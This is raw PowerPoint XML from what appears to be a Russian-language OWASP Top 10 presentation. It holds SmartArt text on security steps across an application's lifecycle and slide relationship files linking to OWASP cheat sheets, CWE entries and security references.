        <a:ext cx="5329415" cy="932506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="1037453"/>
          <a:ext cx="1115983" cy="11567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Запрос предложений и заключение контракта</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="188876" y="1091931"/>
        <a:ext cx="1007027" cy="1047816"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3387359" y="116779"/>
          <a:ext cx="1156352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планы и проекты с разработчиками и внутренними партнерами, например специалистами по безопасности.</a:t>
          </a:r>
        </a:p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архитектуру и средства управления безопасностью, а также контрмеры, соответствующие требованиям защиты и ожидаемым уровням опасности. Все это должно обеспечиваться специалистами по безопасности.</a:t>
          </a:r>
        </a:p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Убедитесь, что владелец приложения принимает остальные риски или предоставляет дополнительные ресурсы.</a:t>
          </a:r>
        </a:p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 каждом спринте обеспечьте создание записей по безопасности с указанием ограничений, добавленных для нефункциональных требований.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1306830" y="2310204"/>
        <a:ext cx="5317411" cy="1043456"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="2252941"/>
          <a:ext cx="1115983" cy="11579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Планирование и проектирование</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="188876" y="2307419"/>
        <a:ext cx="1007027" cy="1049026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3330683" y="1467374"/>
          <a:ext cx="1360831" cy="5425004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Автоматизируйте безопасное развертывание приложения, интерфейсов и компонентов, а также получение необходимых разрешений.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технические возможности и интеграцию с ИТ-архитектурой, а также организуйте бизнес-тестирование.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"штатное" и "нештатное" использование технических и производственных возможностей.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Организуйте тестирование безопасности в соответствии с внутренними процессами, требованиями защиты и предполагаемым уровнем опасности для каждого приложения.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Введите приложение в эксплуатацию и перестаньте использовать старые приложения при необходимости.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Согласуйте всю документацию, а также базу данных контроля изменений и архитектуру безопасности.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1365027" y="3565890"/>
        <a:ext cx="5292144" cy="1227971"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="3469639"/>
          <a:ext cx="1164198" cy="14204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2227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5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Развертывание, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="105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тестирование и внедрение</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="191229" y="3526470"/>
        <a:ext cx="1050536" cy="1306812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3368601" y="2830866"/>
          <a:ext cx="1186386" cy="5425004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123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/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должны включать в себя управление безопасностью приложения (например, управление обновлениями).</a:t>
          </a:r>
        </a:p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Обратите внимание пользователей на безопасность, а также найдите компромисс между практичностью и безопасностью.</a:t>
          </a:r>
        </a:p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проведите модификации, например переход на новую версию приложения или использование других компонентов (ОС, ПО или библиотек).</a:t>
          </a:r>
        </a:p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Обновите документацию, включая документацию по контролю изменений, архитектуре безопасности, элементам управления и мерам противодействия, а также документацию по текущим задачам или проектам.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1307207" y="5008090"/>
        <a:ext cx="5309174" cy="1070556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="4948829"/>
          <a:ext cx="1114893" cy="118907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и контроль изменений</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="188823" y="5003254"/>
        <a:ext cx="1006043" cy="1080228"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3673871" y="3846050"/>
          <a:ext cx="583329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123825" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/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90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Все важные данные необходимо заархивировать, а остальные безопасно удалить.</a:t>
          </a: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Осуществите безопасный вывод приложения из эксплуатации, включая удаление неиспользуемых учетных записей, а также ролей и разрешений.</a:t>
          </a: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Установите приложению статус "выведено из эксплуатации" в БД контроля изменений.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1278858" y="6298015"/>
        <a:ext cx="5373355" cy="526377"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="134398" y="6196622"/>
          <a:ext cx="1115983" cy="7291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Вывод из эксплуатации</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="169993" y="6232217"/>
        <a:ext cx="1044793" cy="65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1254" y="2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/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{46C0059F-706E-42AF-B504-DA4BA04161AF}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>20.09.2019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13513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1254" y="8613513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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{91832A97-7139-43D2-8F8B-094A116E15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4" y="3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/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C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681038"/>
            <a:ext cx="2546350" cy="3398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898" tIns="53949" rIns="107898" bIns="539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1" y="4307206"/>
            <a:ext cx="5425440" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="107898" tIns="53949" rIns="107898" bIns="53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8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4" y="8612838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 anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED7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2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5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7800" y="865716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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF07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6199"/>
            <a:ext cx="5486400" cy="762001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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="6372000"/>
            <a:ext cx="3383280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lIns="54000" tIns="54000" rIns="54000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6199"/>
            <a:ext cx="5486400" cy="762001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Exo 2" panose="00000500000000000000" pitchFamily="2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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 10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4264512"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957457"/>
          <a:ext cx="6836400" cy="2102203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203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App. Specific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Business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?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06"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="6372000"/>
            <a:ext cx="3383280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Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10800" y="3132000"/>
            <a:ext cx="3383280" cy="316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6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0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" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="3132000"/>
            <a:ext cx="3383280" cy="316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4248" y="1044000"/>
            <a:ext cx="6071752" cy="388200"/>
            <a:chOff x="24248" y="1044000"/>
            <a:chExt cx="6071752" cy="388200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="24248" y="1044000"/>
              <a:ext cx="6071752" cy="388200"/>
              <a:chOff x="24248" y="1056343"/>
              <a:chExt cx="6071752" cy="388200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1056343"/>
                <a:ext cx="609600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Impacts</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p: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493228" y="1105375"/>
                <a:ext cx="139700" cy="305289"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28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29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1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2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25" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="24248" y="1079143"/>
                <a:ext cx="484949" cy="2975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>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc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Threat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Agents</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1143000" y="1076806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Attack</a:t>
                </a:r>
              </a:p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Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879477" y="1063543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Security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Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="23" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2005013" y="1253973"/>
                <a:ext cx="838922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22" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="683695" y="1253973"/>
                <a:ext cx="453600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16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1051200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 dirty="0">
                <a:latin typeface="Exo 2" panose="000005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83600" y="1195200"/>
              <a:ext cx="92320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xo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3899845" y="1241999"/>
              <a:ext cx="1562400" cy="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809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2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ransport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="Externa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we.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V10_Communications" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId30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XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="Externa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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html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www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tool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22.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External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1.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="Externa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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home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cwe.mitre.org/data/definitions/285.html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owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tool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ASVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External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2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="Externa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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management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cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery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esting_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External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.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="Externa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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet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www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection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peakerdeck.com/pwntester/friday-the-13th-json-attacks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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="Externa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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html" TargetMode="Externa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hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="Externa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github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" 